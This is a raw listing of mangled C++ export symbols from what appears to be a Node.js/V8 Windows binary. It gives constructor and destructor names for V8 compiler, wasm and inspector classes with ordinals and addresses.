                                  ??0ScopedExceptionHandler@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAVCodeAssemblerLabel@123@PEAV?$TypedCodeAssemblerVariable@VObject@internal@v8@@@123@@Z8220x140e68fb0
                                  ??0ScriptData@Coverage@debug@v8@@AEAA@_KV?$shared_ptr@VCoverage@internal@v8@@@std@@@Z8230x140a77a20
                                  ??0ScriptData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z8240x14041d390
                                  ??0ScriptData@TypeProfile@debug@v8@@AEAA@_KV?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z8250x140a77a20
                                  ??0ScriptData@TypeProfile@debug@v8@@QEAA@$$QEAV0123@@Z8260x14041d390
                                  ??0ScriptData@internal@v8@@QEAA@PEBEH@Z8270x140611a00
                                  ??0ScriptIterator@SharedFunctionInfo@internal@v8@@QEAA@PEAVIsolate@23@VScript@23@@Z8280x140769c10
                                  ??0ScriptStreamingTask@ScriptCompiler@v8@@AEAA@PEAUScriptStreamingData@internal@2@@Z8290x140076a70
                                  ??0SealHandleScope@v8@@QEAA@PEAVIsolate@1@@Z8300x140a77a80
                                  ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z8310x1403e7f30
                                  ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@AEBV01234@@Z8320x1403e7f30
                                  ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@XZ8330x1403e7f30
                                  ??0Semaphore@base@v8@@QEAA@H@Z8340x140dc8990
                                  ??0SetupIsolateDelegate@internal@v8@@QEAA@AEBV012@@Z8350x140869c80
                                  ??0SetupIsolateDelegate@internal@v8@@QEAA@_N@Z8360x140869ca0
                                  ??0SharedFunctionInfoRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z8370x140452cb0
                                  ??0SharedFunctionInfoRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Handle@VObject@internal@v8@@@23@_N@Z8380x140452d10
                                  ??0SharedMemoryStatistics@v8@@QEAA@XZ8390x140079310
                                  ??0SharedMutex@base@v8@@QEAA@XZ8400x1400cbb20
                                  ??0SignatureMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z8410x14041e490
                                  ??0SignatureMap@wasm@internal@v8@@QEAA@XZ8420x14041e580
                                  ??0SimplifiedLowering@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@W4PoisoningMitigationLevel@23@PEAVTickCounter@23@@Z8430x140fd2ca0
                                  ??0SimplifiedOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z8440x140eb40d0
                                  ??0SimplifiedOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z8450x140fdb5a0
                                  ??0SnapshotCreator@v8@@QEAA@PEAVIsolate@1@PEB_JPEAVStartupData@1@@Z8460x140a77ac0
                                  ??0SnapshotCreator@v8@@QEAA@PEB_JPEAVStartupData@1@@Z8470x140a77bb0
                                  ??0SnapshotData@internal@v8@@IEAA@XZ8480x1405196e0
                                  ??0SnapshotData@internal@v8@@QEAA@$$QEAV012@@Z8490x140519700
                                  ??0SnapshotData@internal@v8@@QEAA@PEBVSerializer@12@@Z8500x1406030c0
                                  ??0SnapshotData@internal@v8@@QEAA@V?$Vector@$$CBE@12@@Z8510x140519740
                                  ??0SourceIdAssigner@compiler@internal@v8@@QEAA@$$QEAV0123@@Z8520x140e4d4e0
                                  ??0SourceIdAssigner@compiler@internal@v8@@QEAA@AEBV0123@@Z8530x140e4d540
                                  ??0SourceIdAssigner@compiler@internal@v8@@QEAA@_K@Z8540x140e4d640
                                  ??0SourcePositionTable@compiler@internal@v8@@QEAA@PEAVGraph@123@@Z8550x140ea5300
                                  ??0SourcePositionTable@internal@v8@@QEAA@XZ8560x140079310
                                  ??0SourcePositionTableBuilder@internal@v8@@QEAA@$$QEAV012@@Z8570x14041e5f0
                                  ??0SourcePositionTableBuilder@internal@v8@@QEAA@AEBV012@@Z8580x14041e640
                                  ??0SourcePositionTableBuilder@internal@v8@@QEAA@W4RecordingMode@012@@Z8590x1409d8f30
                                  ??0SourcePositionTableIterator@internal@v8@@QEAA@V?$Handle@VByteArray@internal@v8@@@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z8600x1409d8f60
                                  ??0SourcePositionTableIterator@internal@v8@@QEAA@V?$Vector@$$CBE@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z8610x1409d8fc0
                                  ??0SourcePositionTableIterator@internal@v8@@QEAA@VByteArray@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z8620x1409d9020
                                  ??0Space@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@PEAVFreeList@12@@Z8630x14041e6f0
                                  ??0SpaceIterator@internal@v8@@QEAA@AEBV012@@Z8640x14041e770
                                  ??0SpaceIterator@internal@v8@@QEAA@PEAVHeap@12@@Z8650x140927700
                                  ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@@Z8660x140988170
                                  ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@PEAVThreadLocalTop@12@@Z8670x140988190
                                  ??0StackGuard@internal@v8@@QEAA@PEAVIsolate@12@@Z8680x14041e790
                                  ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z8690x1403e7f30
                                  ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z8700x1403e7f30
                                  ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@XZ8710x1403e7f30
                                  ??0StackTraceFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@@Z8720x140988880
                                  ??0StackTraceFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@W4StackFrameId@12@@Z8730x1409888e0
                                  ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z8740x1403e7f30
                                  ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z8750x1403e7f30
                                  ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@XZ8760x1403e7f30
                                  ??0StackTraceIterator@debug@v8@@QEAA@XZ8770x14041e7d0
                                  ??0StartupSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVReadOnlySerializer@12@@Z8780x1405fef60
                                  ??0StateValuesAccess@compiler@internal@v8@@QEAA@PEAVNode@123@@Z8790x140076a70
                                  ??0StateValuesCache@compiler@internal@v8@@QEAA@PEAVJSGraph@123@@Z8800x140ea7aa0
                                  ??0StatsCounterThreadSafe@internal@v8@@AEAA@PEAVCounters@12@PEBD@Z8810x140855040
                                  ??0StatsScope@ZoneStats@compiler@internal@v8@@QEAA@PEAV1234@@Z8820x140fb2500
                                  ??0StreamedSource@ScriptCompiler@v8@@QEAA@PEAVExternalSourceStream@12@W4Encoding@012@@Z8830x140a77c00
                                  ??0StreamedSource@ScriptCompiler@v8@@QEAA@V?$unique_ptr@VExternalSourceStream@ScriptCompiler@v8@@U?$default_delete@VExternalSourceStream@ScriptCompiler@v8@@@std@@@std@@W4Encoding@012@@Z8840x140a77c30
                                  ??0StreamingDecoder@wasm@internal@v8@@QEAA@V?$unique_ptr@VStreamingProcessor@wasm@internal@v8@@U?$default_delete@VStreamingProcessor@wasm@internal@v8@@@std@@@std@@@Z8850x140574370
                                  ??0StreamingProcessor@wasm@internal@v8@@QEAA@AEBV0123@@Z8860x1405336d0
                                  ??0StreamingProcessor@wasm@internal@v8@@QEAA@XZ8870x1405336d0
                                  ??0String16@v8_inspector@@QEAA@PEBD@Z8880x1405070e0
                                  ??0String16@v8_inspector@@QEAA@PEBG@Z8890x140507210
                                  ??0StringBuffer@v8_inspector@@QEAA@AEBV01@@Z8900x140077d90
                                  ??0StringBuffer@v8_inspector@@QEAA@XZ8910x140077d90
                                  ??0StringTable@internal@v8@@IEAA@_K@Z8920x140076a70
                                  ??0StringTable@internal@v8@@QEAA@XZ8930x1400cbb20
                                  ??0StringView@v8_inspector@@QEAA@PEBE_K@Z8940x14041e7e0
                                  ??0StringView@v8_inspector@@QEAA@PEBG_K@Z8950x14041e7f0
                                  ??0StringView@v8_inspector@@QEAA@XZ8960x14041e800
                                  ??0StringsStorage@internal@v8@@QEAA@XZ8970x1406cd460
                                  ??0StubCache@internal@v8@@QEAA@PEAVIsolate@12@@Z8980x1408b4da0
                                  ??0SuppressMicrotaskExecutionScope@Isolate@v8@@QEAA@PEAV12@PEAVMicrotaskQueue@2@@Z8990x140a77ca0
                                  ??0SwitchBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVSwitchStatement@23@H@Z9000x14086bca0
                                  ??0Task@ItemParallelJob@internal@v8@@QEAA@PEAVIsolate@23@@Z9010x14091e6f0
                                  ??0Thread@base@v8@@QEAA@AEBVOptions@012@@Z9020x140dc01b0
                                  ??0ThreadTicks@base@v8@@AEAA@_J@Z9030x140076a70
                                  ??0ThreadTicks@base@v8@@QEAA@XZ9040x1400cbb20
                                  ??0TickSample@internal@v8@@QEAA@XZ9050x1406cc3f0
                                  ??0Time@base@v8@@AEAA@_J@Z9060x140076a70
                                  ??0Time@base@v8@@QEAA@XZ9070x1400cbb20
                                  ??0TimeDelta@base@v8@@AEAA@_J@Z9080x140076a70
                                  ??0TimeDelta@base@v8@@QEAA@XZ9090x1400cbb20
                                  ??0TimeTicks@base@v8@@AEAA@_J@Z9100x140076a70
                                  ??0TimeTicks@base@v8@@QEAA@XZ9110x1400cbb20
                                  ??0TopLevelLiveRange@compiler@internal@v8@@QEAA@HW4MachineRepresentation@23@@Z9120x140eefbd0
                                  ??0TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAA@AEBV012@@Z9130x140077940
                                  ??0TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAA@XZ9140x140077940
                                  ??0TracedValue@tracing@v8@@AEAA@XZ9150x1405f4f60
                                  ??0TransitionsAccessor@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VMap@internal@v8@@@12@@Z9160x14041e820
                                  ??0TransitionsAccessor@internal@v8@@QEAA@PEAVIsolate@12@VMap@12@PEAV?$PerThreadAssertScopeDebugOnly@$0A@$0A@@12@@Z9170x14041e850
                                  ??0TryCatch@v8@@QEAA@PEAVIsolate@1@@Z9180x140a77cd0
                                  ??0TryCatchBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVTryCatchStatement@23@W4CatchPrediction@HandlerTable@23@@Z9190x14086bd00
                                  ??0TryFinallyBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVTryFinallyStatement@23@W4CatchPrediction@HandlerTable@23@@Z9200x14086bd70
                                  ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@@Z9210x140435bc0
                                  ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z9220x140435c00
                                  ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@@Z9230x140435cf0
                                  ??0TurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z9240x140435c90
                                  ??0TurboAssemblerBase@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z9250x1409d7ac0
                                  ??0TurboAssemblerBase@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z9260x140435d70
                                  ??0Type@compiler@internal@v8@@AEAA@I@Z9270x140457be0
                                  ??0Type@compiler@internal@v8@@AEAA@PEAVTypeBase@123@@Z9280x140076a70
                                  ??0Type@compiler@internal@v8@@QEAA@XZ9290x1400cbb20
                                  ??0TypeCache@compiler@internal@v8@@QEAA@XZ9300x140e8aaf0
                                  ??0TypeNarrowingReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z9310x140fdf320
                                  ??0TypeProfile@debug@v8@@AEAA@V?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z9320x1403e7ef0
                                  ??0TypeProfile@debug@v8@@QEAA@$$QEAV012@@Z9330x1403e7ef0
                                  ??0TypedOptimization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVCompilationDependencies@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z9340x140fe0ab0
                                  ??0TypedSlotSet@internal@v8@@QEAA@$$QEAV012@@Z9350x14041e880
                                  ??0TypedSlotSet@internal@v8@@QEAA@AEBV012@@Z9360x14041e880
                                  ??0TypedSlotSet@internal@v8@@QEAA@_K@Z9370x14041e8b0
                                  ??0TypedSlots@internal@v8@@QEAA@AEBV012@@Z9380x14041e8d0
                                  ??0TypedSlots@internal@v8@@QEAA@XZ9390x14041e8f0
                                  ??0Typer@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Flags@W4Flag@Typer@compiler@internal@v8@@H@base@3@PEAVGraph@123@PEAVTickCounter@23@@Z9400x140fe4850
                                  ??0UnicodeRangeSplitter@internal@v8@@QEAA@PEAV?$ZoneList@VCharacterRange@internal@v8@@@12@@Z9410x1406be600
                                  ??0Unlocker@v8@@QEAA@PEAVIsolate@1@@Z9420x140076ef0
                                  ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@$$QEAV012@@Z9430x140869cc0
                                  ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@AEBV012@@Z9440x140869d40
                                  ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVParseInfo@12@PEAVFunctionLiteral@12@@Z9450x1409d79f0
                                  ??0UnoptimizedCompileFlags@internal@v8@@AEAA@PEAVIsolate@12@H@Z9460x140739880
                                  ??0UnoptimizedCompileState@internal@v8@@QEAA@AEBV012@@Z9470x1407399b0
                                  ??0UnoptimizedCompileState@internal@v8@@QEAA@PEAVIsolate@12@@Z9480x140739a00
                                  ??0UsePosition@compiler@internal@v8@@QEAA@VLifetimePosition@123@PEAVInstructionOperand@123@PEAXW4UsePositionHintType@123@@Z9490x140eefc60
                                  ??0Uses@Node@compiler@internal@v8@@QEAA@PEAV1234@@Z9500x140076a70
                                  ??0Utf8Decoder@internal@v8@@QEAA@AEBV?$Vector@$$CBE@12@@Z9510x1405fb810
                                  ??0Utf8Value@String@v8@@QEAA@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z9520x140a77d20
                                  ??0V8ContextInfo@v8_inspector@@QEAA@V?$Local@VContext@v8@@@v8@@HVStringView@1@@Z9530x14041e910
                                  ??0V8HeapExplorer@internal@v8@@QEAA@PEAVHeapSnapshot@12@PEAVSnapshottingProgressReportingInterface@12@PEAVObjectNameResolver@HeapProfiler@2@@Z9540x1406da070
                                  ??0V8Inspector@v8_inspector@@QEAA@AEBV01@@Z9550x14041e950
                                  ??0V8Inspector@v8_inspector@@QEAA@XZ9560x14041e950
                                  ??0V8InspectorClient@v8_inspector@@QEAA@AEBV01@@Z9570x14041e960
                                  ??0V8InspectorClient@v8_inspector@@QEAA@XZ9580x14041e960
                                  ??0V8InspectorSession@v8_inspector@@QEAA@AEBV01@@Z9590x14041e970
                                  ??0V8InspectorSession@v8_inspector@@QEAA@XZ9600x14041e970
                                  ??0V8StackTrace@v8_inspector@@QEAA@AEBV01@@Z9610x14041e980
                                  ??0V8StackTrace@v8_inspector@@QEAA@XZ9620x14041e980
                                  ??0V8StackTraceId@v8_inspector@@QEAA@VStringView@1@@Z9630x1404cd370
                                  ??0V8StackTraceId@v8_inspector@@QEAA@XZ9640x1404cd6e0
                                  ??0V8StackTraceId@v8_inspector@@QEAA@_KU?$pair@_J_J@std@@@Z9650x1404cd720
                                  ??0V8StackTraceId@v8_inspector@@QEAA@_KU?$pair@_J_J@std@@_N@Z9660x1404cd740
                                  ??0Value@String@v8@@QEAA@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z9670x140a77e80
                                  ??0ValueDeserializer@v8@@QEAA@PEAVIsolate@1@PEBE_K@Z9680x140a78050
                                  ??0ValueDeserializer@v8@@QEAA@PEAVIsolate@1@PEBE_KPEAVDelegate@01@@Z9690x140a78070
                                  ??0ValueNumberingReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z9700x140e7b1e0
                                  ??0ValueNumberingReducer@compiler@internal@v8@@QEAA@PEAVZone@23@0@Z9710x140fec700
                                  ??0ValueSerializer@v8@@QEAA@PEAVIsolate@1@@Z9720x140a78150
                                  ??0ValueSerializer@v8@@QEAA@PEAVIsolate@1@PEAVDelegate@01@@Z9730x140a781c0
                                  ??0VirtualMemory@internal@v8@@QEAA@PEAVPageAllocator@2@_KPEAX1W4JitPermission@012@@Z9740x1405f3c90
                                  ??0VirtualMemory@internal@v8@@QEAA@XZ9750x140079310
                                  ??0VoidDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z9760x140457bf0
                                  ??0VoidDescriptor@internal@v8@@QEAA@$$QEAV012@@Z9770x140457c20
                                  ??0VoidDescriptor@internal@v8@@QEAA@AEBV012@@Z9780x140457c20
                                  ??0VoidDescriptor@internal@v8@@QEAA@XZ9790x140457c40
                                  ??0WasmCode@wasm@internal@v8@@AEAA@PEAVNativeModule@123@HV?$Vector@E@23@HHHHHHHV?$Vector@$$CBE@23@22W4Kind@0123@W4ExecutionTier@123@W4ForDebugging@123@@Z9800x14041e990
                                  ??0WasmCodeManager@wasm@internal@v8@@QEAA@_K@Z9810x14056c570
                                  ??0WasmCodeRefScope@wasm@internal@v8@@QEAA@XZ9820x14056c5d0
                                  ??0WasmCompilationUnit@wasm@internal@v8@@QEAA@HW4ExecutionTier@123@W4ForDebugging@123@@Z9830x140519760
                                  ??0WasmDebugSymbols@wasm@internal@v8@@QEAA@XZ9840x14041eb00
                                  ??0WasmEngine@wasm@internal@v8@@QEAA@XZ9850x14055c450
                                  ??0WasmError@wasm@internal@v8@@QEAA@$$QEAV0123@@Z9860x140519770
                                  ??0WasmError@wasm@internal@v8@@QEAA@AEBV0123@@Z9870x1405197b0
                                  ??0WasmError@wasm@internal@v8@@QEAA@IPEBDZZ9880x1405197e0
                                  ??0WasmError@wasm@internal@v8@@QEAA@IV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z9890x140519900
                                  ??0WasmError@wasm@internal@v8@@QEAA@XZ9900x140519940
                                  ??0WasmFunctionBuilder@wasm@internal@v8@@AEAA@PEAVWasmModuleBuilder@123@@Z9910x14052bbd0
                                  ??0WasmFunctionBuilder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z9920x14052bd80
                                  ??0WasmFunctionBuilder@wasm@internal@v8@@QEAA@AEBV0123@@Z9930x14052bfd0
                                  ??0WasmGraphBuilder@compiler@internal@v8@@QEAA@PEAUCompilationEnv@wasm@23@PEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEAVSourcePositionTable@123@@Z9940x140e4d7f0
                                  ??0WasmInterpreter@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBUWasmModule@123@AEBUModuleWireBytes@123@V?$Handle@VWasmInstanceObject@internal@v8@@@23@@Z9950x140541ea0
                                  ??0WasmModule@wasm@internal@v8@@QEAA@V?$unique_ptr@VZone@internal@v8@@U?$default_delete@VZone@internal@v8@@@std@@@std@@@Z9960x140527210
                                  ??0WasmModuleBuilder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z9970x14052c180
                                  ??0WasmModuleBuilder@wasm@internal@v8@@QEAA@AEBV0123@@Z9980x14052c590
                                  ??0WasmModuleBuilder@wasm@internal@v8@@QEAA@PEAVZone@23@@Z9990x14052cca0
                                  ??0WasmModuleObjectBuilderStreaming@v8@@AEAA@$$QEAV01@@Z10000x140077490
                                  ??0WasmModuleObjectBuilderStreaming@v8@@QEAA@PEAVIsolate@1@@Z10010x140a77790
                                  ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z10020x14041eb10
                                  ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@AEBV0123@@Z10030x14041ebc0
                                  ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@PEAVIsolate@3@V?$Local@VString@v8@@@3@@Z10040x14052a030
                                  ??0WasmSerializer@wasm@internal@v8@@QEAA@$$QEAV0123@@Z10050x140077b40
                                  ??0WasmSerializer@wasm@internal@v8@@QEAA@AEBV0123@@Z10060x140519960
                                  ??0WasmSerializer@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z10070x1405199f0
                                  ??0WasmStreaming@v8@@QEAA@V?$unique_ptr@VWasmStreamingImpl@WasmStreaming@v8@@U?$default_delete@VWasmStreamingImpl@WasmStreaming@v8@@@std@@@std@@@Z10080x1405336e0
                                  ??0WasmTableObject@internal@v8@@IEAA@_K@Z10090x140076a70
                                  ??0WasmTableObject@internal@v8@@QEAA@XZ10100x1400cbb20
                                  ??0Zone@internal@v8@@QEAA@PEAVAccountingAllocator@12@PEBD@Z10110x140514f60
                                  ??0ZonePreparseData@internal@v8@@QEAA@PEAVZone@12@PEAV?$Vector@E@12@H@Z10120x140724d80
                                  ??0ZoneStats@compiler@internal@v8@@QEAA@PEAVAccountingAllocator@23@@Z10130x140fb26e0
                                  ??0iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA@HHHPEBVBytecodeArrayAccessor@234@@Z10140x14089a830
                                  ??0iterator@StateValuesAccess@compiler@internal@v8@@AEAA@PEAVNode@234@@Z10150x140ea7b60
                                  ??0iterator@StateValuesAccess@compiler@internal@v8@@AEAA@XZ10160x140e343c0
                                  ??1?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAA@XZ10170x1406f8bb0
                                  ??1?$PerIsolateAssertScope@$00$00@internal@v8@@QEAA@XZ10180x1409d7740
                                  ??1?$PerIsolateAssertScope@$00$0A@@internal@v8@@QEAA@XZ10190x1409d7740
                                  ??1?$PerIsolateAssertScope@$01$00@internal@v8@@QEAA@XZ10200x1409d7740
                                  ??1?$PerIsolateAssertScope@$01$0A@@internal@v8@@QEAA@XZ10210x1409d7740
                                  ??1?$PerIsolateAssertScope@$02$00@internal@v8@@QEAA@XZ10220x1409d7740
                                  ??1?$PerIsolateAssertScope@$02$0A@@internal@v8@@QEAA@XZ10230x1409d7740
                                  ??1?$PerIsolateAssertScope@$03$00@internal@v8@@QEAA@XZ10240x1409d7740
                                  ??1?$PerIsolateAssertScope@$03$0A@@internal@v8@@QEAA@XZ10250x1409d7740
                                  ??1?$PerIsolateAssertScope@$04$00@internal@v8@@QEAA@XZ10260x1409d7740
                                  ??1?$PerIsolateAssertScope@$04$0A@@internal@v8@@QEAA@XZ10270x1409d7740
                                  ??1?$PerIsolateAssertScope@$0A@$00@internal@v8@@QEAA@XZ10280x1409d7740
                                  ??1?$PerIsolateAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ10290x1409d7740
                                  ??1?$PerThreadAssertScope@$00$00@internal@v8@@QEAA@XZ10300x1409d7750
                                  ??1?$PerThreadAssertScope@$00$0A@@internal@v8@@QEAA@XZ10310x1409d7750
                                  ??1?$PerThreadAssertScope@$01$00@internal@v8@@QEAA@XZ10320x1409d77a0
                                  ??1?$PerThreadAssertScope@$01$0A@@internal@v8@@QEAA@XZ10330x1409d77a0
                                  ??1?$PerThreadAssertScope@$02$00@internal@v8@@QEAA@XZ10340x1409d77f0
                                  ??1?$PerThreadAssertScope@$02$0A@@internal@v8@@QEAA@XZ10350x1409d77f0
                                  ??1?$PerThreadAssertScope@$0A@$00@internal@v8@@QEAA@XZ10360x1409d7840
                                  ??1?$PerThreadAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ10370x1409d7840
                                  ??1?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@XZ10380x14041f0a0
                                  ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ10390x1400c01b0
                                  ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ10400x1400c01c0
                                  ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ10410x1400c01f0
                                  ??1?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAA@XZ10420x14041edd0
                                  ??1?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@XZ10430x14041f0a0
                                  ??1?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@XZ10440x140079340
                                  ??1?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@XZ10450x140078fb0
                                  ??1AbstractBytecodeArray@interpreter@internal@v8@@UEAA@XZ10460x1400768e0
                                  ??1AccountingAllocator@internal@v8@@UEAA@XZ10470x140515280
                                  ??1ActivityControl@v8@@UEAA@XZ10480x1400768e0
                                  ??1AddTypeAssertionsReducer@compiler@internal@v8@@UEAA@XZ10490x140ee54c0
                                  ??1AddressToTraceMap@internal@v8@@QEAA@XZ10500x1406da220
                                  ??1AllocationProfile@v8@@UEAA@XZ10510x1400768e0
                                  ??1Allocator@ArrayBuffer@v8@@UEAA@XZ10520x1400768e0
                                  ??1AllowJavascriptExecutionScope@Isolate@v8@@QEAA@XZ10530x140a783d0
                                  ??1ArrayBufferAllocator@node@@UEAA@XZ10540x1400768e0
                                  ??1AsmCallableType@wasm@internal@v8@@MEAA@XZ10550x1400768e0
                                  ??1AsmFunctionType@wasm@internal@v8@@UEAA@XZ10560x140452f90
                                  ??1AsmJsOffsetInformation@wasm@internal@v8@@QEAA@XZ10570x1405274d0
                                  ??1AsmJsScanner@internal@v8@@QEAA@XZ10580x140a66580
                                  ??1AsmOverloadedFunctionType@wasm@internal@v8@@UEAA@XZ10590x14052cec0
                                  ??1Assembler@internal@v8@@UEAA@XZ10600x140435e10
                                  ??1AssemblerBase@internal@v8@@UEAA@XZ10610x1409fabb0
                                  ??1AsyncResource@node@@UEAA@XZ10620x14024c9a0
                                  ??1BackgroundCompileTask@internal@v8@@QEAA@XZ10630x1409edf40
                                  ??1BackgroundScope@GCTracer@internal@v8@@QEAA@XZ10640x14093f2e0
                                  ??1BackingStore@internal@v8@@QEAA@XZ10650x14083e3e0
                                  ??1BackingStore@v8@@QEAA@XZ10660x140a78450
                                  ??1BackupIncumbentScope@Context@v8@@QEAA@XZ10670x140a78460
                                  ??1BasicBlock@compiler@internal@v8@@QEAA@XZ10680x140457c60
                                  ??1BigIntToI32PairDescriptor@internal@v8@@UEAA@XZ10690x1400768e0
                                  ??1BigIntToI64Descriptor@internal@v8@@UEAA@XZ10700x1400768e0
                                  ??1Binary@protocol@v8_inspector@@QEAA@XZ10710x1400773a0
                                  ??1BlockBuilder@interpreter@internal@v8@@UEAA@XZ10720x14086be30
                                  ??1BlockData@Coverage@debug@v8@@QEAA@XZ10730x14041ef70
                                  ??1BoundedPageAllocator@base@v8@@UEAA@XZ10740x140dc9de0
                                  ??1BranchElimination@compiler@internal@v8@@UEAA@XZ10750x140eff520
                                  ??1BreakableControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ10760x14086be40
                                  ??1BytecodeAnalysis@compiler@internal@v8@@QEAA@XZ10770x140dd7bf0
                                  ??1BytecodeArrayAccessor@interpreter@internal@v8@@QEAA@XZ10780x1406778d0
                                  ??1BytecodeArrayBuilder@interpreter@internal@v8@@QEAA@XZ10790x140869da0
                                  ??1BytecodeArrayIterator@interpreter@internal@v8@@QEAA@XZ10800x1406778d0
                                  ??1BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@XZ10810x140889f70
                                  ??1BytecodeArrayWriter@interpreter@internal@v8@@QEAA@XZ10820x140869df0
                                  ??1BytecodeIterator@wasm@internal@v8@@UEAA@XZ10830x140519a20
                                  ??1BytecodeLabels@interpreter@internal@v8@@QEAA@XZ10840x140869f90
                                  ??1BytecodeLivenessMap@compiler@internal@v8@@QEAA@XZ10850x1400768e0
                                  ??1BytecodeRegisterOptimizer@interpreter@internal@v8@@UEAA@XZ10860x140870bb0
                                  ??1CachedData@ScriptCompiler@v8@@QEAA@XZ10870x140a78480
                                  ??1CallInterfaceDescriptor@internal@v8@@UEAA@XZ10880x1400768e0
                                  ??1CallbackScope@AsyncResource@node@@QEAA@XZ10890x140077e60
                                  ??1CallbackScope@node@@QEAA@XZ10900x14024bb30
                                  ??1Cancelable@internal@v8@@UEAA@XZ10910x1405f67c0
                                  ??1CancelableTask@internal@v8@@UEAA@XZ10920x14041efc0
                                  ??1CancelableTaskManager@internal@v8@@QEAA@XZ10930x1405f67f0
